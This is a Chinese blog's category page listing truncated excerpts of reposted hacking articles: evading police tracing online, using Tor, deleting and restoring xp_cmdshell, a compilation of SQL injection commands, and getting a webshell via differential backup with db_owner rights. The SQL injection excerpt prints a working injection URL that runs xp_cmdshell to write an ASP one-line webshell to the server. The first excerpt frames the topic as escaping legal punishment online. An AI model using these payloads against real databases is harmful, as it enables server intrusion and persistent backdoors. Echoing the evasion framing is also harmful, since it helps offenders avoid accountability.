TIPS
文章平均质量分 65
edwang133
这个作者很懒,什么都没留下…
展开
-
互联网没有天网恢恢疏而不漏
俗语有云:天网恢恢、疏而不漏!这句话是真的么?现实社会中我不知道。但是在互联网上,这句话在Internet上是很软弱的。读完我这篇文,就可以知道。在网络上触犯现行法律,即便于公安部门立案调查,未必就“落入法网” 注:本文仅做技术研讨,并非讨论如何在犯罪后逃脱法律的惩罚。 首先来认识一下:“网监”也就是公安部门分管网络的部门。他们负责网络监管,如网站和服务器被黑、游戏帐号装转载 2008-07-30 14:14:00 · 581 阅读 · 0 评论 -
用Tor实现有效且安全的互联网访问
一、为什么写?google以很有创意的推广方式推出gmail后,在国内很是热闹了一段时间,但随即大家发现,gmail似乎不如传说中的那么好用,虽然号称容量上 G,但总是动不动就弹出个对话框:“Oops...unable toreach Gmail. Please check your internet connection and tryagain.”,什么操作都是不灵光的。“什么g转载 2008-07-30 14:21:00 · 2115 阅读 · 1 评论 -
xp_cmdshell的删除与恢复
扩展储存过程被删除以后可以有很简单的办法恢复:删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc (转载 2008-07-31 14:06:00 · 1227 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execute request^("l"^)^ >c:/mu.asp;-- ? echo ^ >c:/mu.asp2、 显示SQL系统版本: ? http://192转载 2008-08-18 21:13:00 · 628 阅读 · 0 评论 -
DB_owner下利用差异备份
在SQL注入中,碰到的不是SA权限是不是该放弃呢?不用。可以用备份差异拿到webshell,但是拿到webshell的前提条件必须有几个。第一,要有列目录的权限(能列目录当然不能低于DB_owner)。第二,HTTP500错误不是自定义。第三,WEB和数据在一块。还有的就是数据库中不能存在%号之类的。不然也是不成功的。第四,数据量不能太大,太大了没法在IE打开。列目录这个权限可有可无,但是原创 2008-08-19 12:49:00 · 635 阅读 · 1 评论